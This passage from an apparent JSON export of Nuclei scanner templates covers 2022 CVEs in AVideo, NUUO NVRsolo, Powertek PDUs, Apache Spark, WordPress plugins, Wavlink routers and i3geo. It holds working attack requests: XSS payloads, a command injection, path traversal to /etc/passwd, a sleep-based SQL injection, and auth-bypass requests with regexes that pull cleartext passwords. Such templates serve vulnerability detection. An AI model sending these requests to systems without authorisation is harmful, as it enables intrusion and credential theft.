vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538\n - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32771\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-32771\n cwe-id: CWE-79\n epss-score: 0.00074\n epss-percentile: 0.30395\n cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wwbn\n product: 
avideo\n shodan-query: http.html:\"AVideo\"\n tags: cve,cve2022,avideo,xss,wwbn\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'avideoAlertSuccess(\"'\n - 'text: \"'\n condition: or\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205cd915db0a5e75b5298087a9d97667756ac6598deed750cf8ae835d0fb3052370220337036c281cbdf23199d21ac1cf6cf370e1cb4aecf7531ed418daf886f164cf2:922c64590222798bb761d5b6d8e72950", "hash": "8c8d3c51ad83f046ebb457322c69919f", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30854a" }, "name": "CVE-2022-32772.yaml", "content": "id: CVE-2022-32772\n\ninfo:\n name: WWBN AVideo 11.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538\n - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32772\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-32772\n cwe-id: CWE-79\n epss-score: 0.00056\n epss-percentile: 0.21026\n cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n 
max-request: 1\n vendor: wwbn\n product: avideo\n shodan-query: http.html:\"AVideo\"\n tags: cve2022,cve,avideo,xss,wwbn\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'avideoAlertInfo(\"'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200250c5a4a2f2f305db862778645d4302544e55e4d9df38285ae08572bbb8461c022100d024e870443986b8f5a4c16ed8f86c0807f0369aea5fbaa7f1dfde75e0c0bb76:922c64590222798bb761d5b6d8e72950", "hash": "914c7905d9067ffbc9e511d68d8a8556", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30854b" }, "name": "CVE-2022-33119.yaml", "content": "id: CVE-2022-33119\n\ninfo:\n name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software.\n reference:\n - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-33119\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/badboycxcc/badboycxcc\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-33119\n cwe-id: CWE-79\n epss-score: 0.0157\n epss-percentile: 0.86981\n cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:*\n 
metadata:\n verified: true\n max-request: 1\n vendor: nuuo\n product: nvrsolo_firmware\n shodan-query: http.html:\"NVRsolo\"\n tags: cve,cve2022,nvrsolo,xss,nuuo\n\nhttp:\n - raw:\n - |\n POST /login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: \"><\"\n\n language=en&user=user&pass=pass&submit=Login\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(header, \"text/html\")'\n - 'status_code == 200'\n - contains(body,'<\\\"?cmd=')\n condition: and\n# digest: 4a0a00473045022100f0f38f1056959a80fda5a1d4ced07d7ae1ac102a7ba4c692c0b0150a62461f0502205b4da7a44c66b407918128ef1f68b82728505e5d40ef1467678a122bd7212b0b:922c64590222798bb761d5b6d8e72950", "hash": "5b3f50ce59449caccad37d8f3d7c0c37", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30854c" }, "name": "CVE-2022-33174.yaml", "content": "id: CVE-2022-33174\n\ninfo:\n name: Powertek Firmware <3.30.30 - Authorization Bypass\n author: pikpikcu\n severity: high\n description: |\n Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. 
This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the Powertek Firmware, potentially leading to further compromise of the system.\n remediation: |\n Upgrade the Powertek Firmware to version 3.30.30 or higher to mitigate the vulnerability.\n reference:\n - https://gynvael.coldwind.pl/?lang=en&id=748\n - https://nvd.nist.gov/vuln/detail/CVE-2022-33174\n - https://github.com/Henry4E36/CVE-2022-33174\n - https://github.com/k0mi-tg/CVE-POC\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-33174\n cwe-id: CWE-863\n epss-score: 0.01241\n epss-percentile: 0.85189\n cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: powertekpdus\n product: basic_pdu_firmware\n shodan-query: http.html:\"Powertek\"\n tags: cve2022,cve,powertek,auth-bypass,powertekpdus\n\nhttp:\n - raw:\n - |\n GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\n Host: {{Hostname}}\n Cookie: tmpToken=;\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - ''\n - ''\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '([A-Z0-9a-z]+)<\\/sys\\.passwd>'\n - '([a-z]+)<\\/sys\\.su\\.name>'\n part: body\n# digest: 490a0046304402205f3721d4d1cc1bd01d55480d74005f566999d1eb1f7aef883abe68afa60e1d4102202cd3dede0c67c2903cde37b3f54d432dcbb537f4bfb2e29d4ee779cac0609d99:922c64590222798bb761d5b6d8e72950", "hash": "ab128c9c8dd0e734621b059b12148a93", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30854d" }, "name": "CVE-2022-33891.yaml", "content": "id: CVE-2022-33891\n\ninfo:\n name: Apache Spark UI - Remote Command Injection\n author: princechaddha\n severity: high\n description: 
|\n Apache Spark UI is susceptible to remote command injection. ACLs can be enabled via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow impersonation by providing an arbitrary user name. An attacker can potentially reach a permission check function that will ultimately build a Unix shell command based on input and execute it, resulting in arbitrary shell command execution. Affected versions are 3.0.3 and earlier, 3.1.1 to 3.1.2, and 3.2.0 to 3.2.1.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n Apply the latest security patches or updates provided by Apache Spark to fix the remote command injection vulnerability.\n reference:\n - https://github.com/W01fh4cker/cve-2022-33891\n - https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc\n - http://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-33891\n - http://www.openwall.com/lists/oss-security/2023/05/02/1\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-33891\n cwe-id: CWE-78\n epss-score: 0.97289\n epss-percentile: 0.99851\n cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: spark\n shodan-query: title:\"Spark Master at\"\n tags: cve2022,cve,apache,spark,authenticated,kev,packetstorm\nvariables:\n command: \"echo CVE-2022-33891 | rev\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?doAs=`{{url_encode(\"{{command}}\")}}`'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"19833-2202-EVC\"\n# digest: 
4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950", "hash": "7aa8fa0b00360e638e8baf230ea20038", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30854e" }, "name": "CVE-2022-33901.yaml", "content": "id: CVE-2022-33901\n\ninfo:\n name: WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read\n author: theamanrawat\n severity: high\n description: |\n WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n An attacker can access sensitive information stored in arbitrary files on the server, potentially leading to further compromise of the system.\n remediation: |\n Update WordPress MultiSafepay for WooCommerce plugin to a version later than 4.13.1 (versions through 4.13.1 are affected).\n reference:\n - https://wordpress.org/plugins/multisafepay/\n - https://wordpress.org/plugins/multisafepay/#developers\n - https://patchstack.com/database/vulnerability/multisafepay/wordpress-multisafepay-plugin-for-woocommerce-plugin-4-13-1-unauthenticated-arbitrary-file-read-vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2022-33901\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-33901\n epss-score: 0.00779\n epss-percentile: 0.80981\n cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: multisafepay\n product: multisafepay_plugin_for_woocommerce\n framework: wordpress\n tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202ae9ccfcd2d44fcb8006ba953a197c97d4ecfacdad1348585abddafee07bb83102204e83d79dbe8ee0856aa30e9d9833f4f2d553fd603b0952a23e5c83d208c62401:922c64590222798bb761d5b6d8e72950", "hash": "6658d99947fcbda1270e7ca778009857", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30854f" }, "name": "CVE-2022-33965.yaml", "content": "id: CVE-2022-33965\n\ninfo:\n name: WordPress Visitor Statistics <=5.7 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.\n remediation: |\n Update to the latest version of the WordPress Visitor Statistics plugin (>=5.8) to mitigate the SQL Injection vulnerability.\n reference:\n - https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities\n - https://wordpress.org/plugins/wp-stats-manager/\n - https://wordpress.org/plugins/wp-stats-manager/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2022-33965\n - https://github.com/20142995/sectool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: 
CVE-2022-33965\n cwe-id: CWE-89\n epss-score: 0.01233\n epss-percentile: 0.83986\n cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: plugins-market\n product: wp_visitor_statistics\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-stats-manager\"\n tags: cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n\n - type: regex\n regex:\n - \"^1331' and sleep\\\\(7\\\\) or '$\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220458bd56d4667cfa3e15751e8422d0ba54e709c7e9d7a857053c0307e24cdaa8302205b0be1ac0171f03bb15ec954e402ff2fba222f6711aa86faffac17ebffc02f19:922c64590222798bb761d5b6d8e72950", "hash": "a5867ceb1fb262416e443dcfa70dda5e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308550" }, "name": "CVE-2022-34045.yaml", "content": "id: CVE-2022-34045\n\ninfo:\n name: WAVLINK WN530HG4 - Improper Access Control\n author: arafatansari\n severity: critical\n description: |\n WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. It contains a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the access control issue.\n reference:\n - https://drive.google.com/file/d/1s5uZGC_iSzfCJt9BJ8h-P24vmsrmttrf/view?usp=sharing\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34045\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-34045\n cwe-id: CWE-798\n epss-score: 0.05662\n epss-percentile: 0.93156\n cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn530hg4_firmware\n shodan-query: http.html:\"WN530HG4\"\n tags: cve,cve2022,wavlink,exposure\n\nhttp:\n - raw:\n - |\n GET /backupsettings.dat HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Salted__'\n\n - type: word\n part: header\n words:\n - application/octet-stream\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100fb0b8aa54fde332f8cd44ca55dfda68ee8eaad6e9c47f58cd20feb3873a04ac402206045d384f557a00bd359d936396b51e46a94bd70a5ff2e253f622d481a211aab:922c64590222798bb761d5b6d8e72950", "hash": "e588d8373a1a3ce532cc51d9631558e3", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308551" }, "name": "CVE-2022-34046.yaml", "content": "id: CVE-2022-34046\n\ninfo:\n name: WAVLINK WN533A8 - Improper Access Control\n author: For3stCo1d\n severity: high\n description: |\n WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. 
An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the entire network.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the access control issue.\n reference:\n - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046\n - http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34046\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-34046\n cwe-id: CWE-863\n epss-score: 0.14292\n epss-percentile: 0.95577\n cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn533a8_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2022,packetstorm,wavlink,router,exposure\n\nhttp:\n - raw:\n - |\n GET /sysinit.shtml?r=52300 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'var syspasswd=\"'\n - 'APP'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - 'syspasswd=\"(.+?)\"'\n# digest: 4a0a004730450220012d32e7af94355d9d79d3210f97d2bdf114e7d81c8a425f14611b6898afdcb2022100d2e6dd7fe5b5f462e9bccc0179f3417fa34f94d1006498add8171cba0ec4af4c:922c64590222798bb761d5b6d8e72950", "hash": "63f5ab76985419954bd76dd2224ea40a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308552" }, "name": "CVE-2022-34047.yaml", 
"content": "id: CVE-2022-34047\n\ninfo:\n name: WAVLINK WN530HG4 - Improper Access Control\n author: For3stCo1d\n severity: high\n description: |\n WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the access control issue.\n reference:\n - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047\n - http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34047\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-34047\n cwe-id: CWE-668\n epss-score: 0.14292\n epss-percentile: 0.95577\n cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn530hg4_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2022,wavlink,router,exposure,packetstorm\n\nhttp:\n - raw:\n - |\n GET /set_safety.shtml?r=52300 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'var syspasswd=\"'\n - 'APP'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - 'syspasswd=\"(.+?)\"'\n# digest: 
4b0a004830460221009d579af2f6d3d5044fff3d3ba8ae41ae23b08238a57030a5aca5ce2e072c848f02210096fb879980b385c7240a0b97b5ed0b21d8a2e4ab835977407c3e156daaece404:922c64590222798bb761d5b6d8e72950", "hash": "4f23a56245448568c357640aae31a349", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308553" }, "name": "CVE-2022-34048.yaml", "content": "id: CVE-2022-34048\n\ninfo:\n name: Wavlink WN-533A8 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50989\n - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing\n - https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34048\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-34048\n cwe-id: CWE-79\n epss-score: 0.00107\n epss-percentile: 0.43187\n cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn533a8_firmware\n shodan-query: http.html:\"Wavlink\"\n tags: cve2022,cve,wavlink,xss,router,edb\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/login.cgi HTTP/1.1\n Host: {{Hostname}}\n\n 
newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'x\");alert(9);x=(\"?login=0\");'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220517ca1dce8d4d311ecbc72009be25a53b0ccf3bcc93670f195b5f037608dfef0022100e45d38b599b8695586de222b078c5ebb059c93246d3d687afc08bf6e5710226a:922c64590222798bb761d5b6d8e72950", "hash": "41fe7a304e73e13f4d1467a3004c9058", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308554" }, "name": "CVE-2022-34049.yaml", "content": "id: CVE-2022-34049\n\ninfo:\n name: WAVLINK WN530HG4 - Improper Access Control\n author: For3stCo1d\n severity: medium\n description: |\n Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. 
An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the router's settings, potentially leading to further compromise of the network or device.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the access control issue.\n reference:\n - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049\n - https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing\n - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34049\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-34049\n cwe-id: CWE-552\n epss-score: 0.17111\n epss-percentile: 0.95601\n cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn530hg4_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2022,wavlink,router,exposure\n\nhttp:\n - raw:\n - |\n GET /cgi-bin/ExportLogs.sh HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Login'\n - 'Password'\n condition: and\n\n - type: word\n part: header\n words:\n - filename=\"sysLogs.txt\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fe2b14acc7033ceb8f4865eea336e52f57abfcde0cdd377d01e8350e962bed1d0221008fcfa7a19d5076433d9771e4b486a3e7fe8ff8eb61a72aab3dd5a8320dcbd8d2:922c64590222798bb761d5b6d8e72950", "hash": "d1a77be5d7b7aaf38b3e859502f2ed09", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308555" }, "name": "CVE-2022-34093.yaml", "content": "id: 
CVE-2022-34093\n\ninfo:\n name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34093\n - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44\n - https://owasp.org/www-community/attacks/xss/\n - https://softwarepublico.gov.br/social/i3geo\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-34093\n cwe-id: CWE-79\n epss-score: 0.00266\n epss-percentile: 0.65533\n cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: softwarepublico\n product: i3geo\n tags: cve,cve2022,i3geo,xss,softwarepublico\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")'\n condition: and\n# digest: 4a0a00473045022100b6c16f44954588e4bae35bb1d81fb7146230861817ce49f5a3de2f00e70a282a02204ac735c905d496f7e25c3534786304a13f57730db0a36a2c722fa4471bb64fa0:922c64590222798bb761d5b6d8e72950", "hash": "d6b3af524992f93891871d0a2b5c7f76", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308556" }, "name": "CVE-2022-34094.yaml", "content": "id: CVE-2022-34094\n\ninfo:\n name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) 
